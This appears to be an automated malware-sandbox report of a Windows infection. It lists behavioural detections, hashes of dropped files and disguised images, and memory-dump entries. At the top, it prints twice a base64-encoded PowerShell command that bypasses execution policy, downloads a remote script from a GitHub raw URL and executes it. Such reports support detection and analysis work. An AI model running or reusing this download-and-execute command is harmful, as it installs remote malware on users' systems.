C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blacklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES72E4.tmpMD5
1fdcac54833b011555c43094a1763d21
SHA17fb9f16f77494526834a661676df5f9cefc34491
SHA256f55f5e5849b63b8f96aac934a51b656348a3f988ff7092e516d8cd6b3be2171c
SHA512df85222ec6c2ed4751f312f4b79e751ab2cffef626c9782cc04833d81cee5dfb1ed4ae127e68ca83fc7d74b7bea3e18131469fac012a65823432ee8114f998cf
-
C:\Users\Admin\AppData\Local\Temp\exvorycj\exvorycj.dllMD5
ebcf3dd3fb890e09d5aaf53f5d2cd059
SHA1c7fd9283e74d7d404db99271b5561fd11e48661b
SHA2563eb996aaf7f0200b46a2f8dfdcb313bceec55b1f1d36eae356ebc754fee8ce23
SHA51211c326e4b57f4a4cb618944c47cb5aa89eccb5402bb56e50564ec94a26316678cbfa0f61c7330a79792f6a07d953367fe925590c2b4296d7a3d97c1950fdad1c
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
dac6b25db50155c0c78d5bf64fb95fa3
SHA19e49c8f7a6df94acdefd0daa4c330f92f6d01d0d
SHA2566967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf
SHA512679b3706f2c03898afb4250b1f51d5e0e7187ed923f7d7cc3a06c5f9a1e5b18bbbc46e9c2c9abd0b4b42e5e3a5b2dd668e3057063562b874119c42e855292868
-
C:\Users\Admin\AppData\Local\Temp\get-points.zipMD5
7cac19b2868c41555db4b71219217f9b
SHA1d6f77db578db3c5c572c3a944d9072ed00560dcb
SHA256d8f648e2952466c25343b095ed14591b25b29d0d1c391ca019a8d8f0a39b934a
SHA5125bafea5eed1ba0493188bb79eafda47a141281fb3258be0dfe08b6b78e5dcf731fd2142b94f95b3203fa6daad27fff1f4495ac7bdebe6eb8a9cbe31b16bfc7b6
-
\??\c:\Users\Admin\AppData\Local\Temp\exvorycj\CSCA0829ACF0674A82AF57138E0B8E8.TMPMD5
6fb54f8c18a72f011cdb689b07b44ddb
SHA11b399425401fc3ec157ea86b9c1df1c9ce7463b3
SHA25667d3963e68d13fbbb0b49e29d25dac000c5766e5824a40cd33c3aa00dd4da47b
SHA512e89b3aa38d2be25949cb29135e11f7d544a63a1c0bc2816be8501bec62d1524531570b9169bdb1d625691a75b195e797237b76b56f7170001cf18f091c86aed6
-
\??\c:\Users\Admin\AppData\Local\Temp\exvorycj\exvorycj.0.csMD5
6f235215132cdebacd0f793fe970d0e3
SHA12841e44c387ed3b6f293611992f1508fe9b55b89
SHA256ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\exvorycj\exvorycj.cmdlineMD5
7c4b1de28998359d8fcf90315baa0822
SHA113776de0b9e5ef30225aeb3c43f27de4c3f649b2
SHA256fa27bf08fbb07555661aa1c8f58a1efa94d3aa66d4c057dba12963d2f9cfb5f0
SHA5128a226984b6f77a1293850742124007f89dcd652fcdc78dc9a567cbd1df24d916b59a81fd29224a9a51e678cd6ae87ac43df935480cb1decbee1c22df691294f8
-
\Windows\Branding\mediasrv.pngMD5
eeb448ea2709c57b9ea2e223d0c79396
SHA138331dd027386151ee37a29a7820570a76427b02
SHA256c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272
SHA512c133096ce90e5693669c056a31870b982b162196508babae4d1d9eb4055f2096af9460164d68885693af56389a42977f4193906da1d19f457e26187a46a5e3fc
-
\Windows\Branding\mediasvc.pngMD5
bb873bd05a47f502ee4ed3c4ea749a4f
SHA1e55a6bf49a4833fb9e9b123df39dac9bf507f75a
SHA256a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a
SHA512ce2a22e5e78d3f01a6880a48153f6d3ba8ff025d7bbfe8949b7742a5b7ffa9e44484027353bb80b70e8cad8181dc26b6aabe637b5f7fd2aa4a99cd880d758548
-
memory/188-41-0x0000000000000000-mapping.dmp
-
memory/196-16-0x0000000000000000-mapping.dmp
-
memory/212-48-0x0000000000000000-mapping.dmp
-
memory/212-15-0x0000000000000000-mapping.dmp
-
memory/420-47-0x0000000000000000-mapping.dmp
-
memory/420-49-0x00007FFC33E60000-0x00007FFC3484C000-memory.dmpFilesize
9.9MB
-
memory/508-32-0x0000000000000000-mapping.dmp
-
memory/580-1-0x00000000018C0000-0x00000000018C1000-memory.dmpFilesize
4KB
-
memory/732-17-0x0000000000000000-mapping.dmp
-
memory/912-35-0x0000000000000000-mapping.dmp
-
memory/1000-25-0x0000000000000000-mapping.dmp
-
memory/1020-14-0x0000021619530000-0x0000021619531000-memory.dmpFilesize
4KB
-
memory/1020-5-0x00000216342D0000-0x00000216342D1000-memory.dmpFilesize
4KB
-
memory/1020-4-0x00000216315D0000-0x00000216315D1000-memory.dmpFilesize
4KB
-
memory/1020-3-0x00007FFC33E60000-0x00007FFC3484C000-memory.dmpFilesize
9.9MB
-
memory/1020-2-0x0000000000000000-mapping.dmp
-
memory/1056-26-0x0000000000000000-mapping.dmp
-
memory/1336-37-0x0000000000000000-mapping.dmp
-
memory/1492-45-0x0000000000000000-mapping.dmp
-
memory/1500-31-0x0000000000000000-mapping.dmp
-
memory/1600-30-0x0000000000000000-mapping.dmp
-
memory/1704-38-0x0000000000000000-mapping.dmp
-
memory/1724-23-0x0000000000000000-mapping.dmp
-
memory/2060-27-0x0000000000000000-mapping.dmp
-
memory/2212-39-0x0000000000000000-mapping.dmp
-
memory/2308-24-0x0000000000000000-mapping.dmp
-
memory/2400-10-0x0000000000000000-mapping.dmp
-
memory/2400-36-0x0000000000000000-mapping.dmp
-
memory/2400-20-0x0000000000000000-mapping.dmp
-
memory/2944-43-0x0000000000000000-mapping.dmp
-
memory/2944-22-0x0000000000000000-mapping.dmp
-
memory/3008-18-0x0000000000000000-mapping.dmp
-
memory/3008-46-0x0000000000000000-mapping.dmp
-
memory/3024-42-0x0000000000000000-mapping.dmp
-
memory/3048-40-0x0000000000000000-mapping.dmp
-
memory/3500-33-0x0000000000000000-mapping.dmp
-
memory/3584-7-0x0000000000000000-mapping.dmp
-
memory/3680-21-0x0000000000000000-mapping.dmp
-
memory/3792-34-0x0000000000000000-mapping.dmp
-
memory/4012-19-0x0000000000000000-mapping.dmp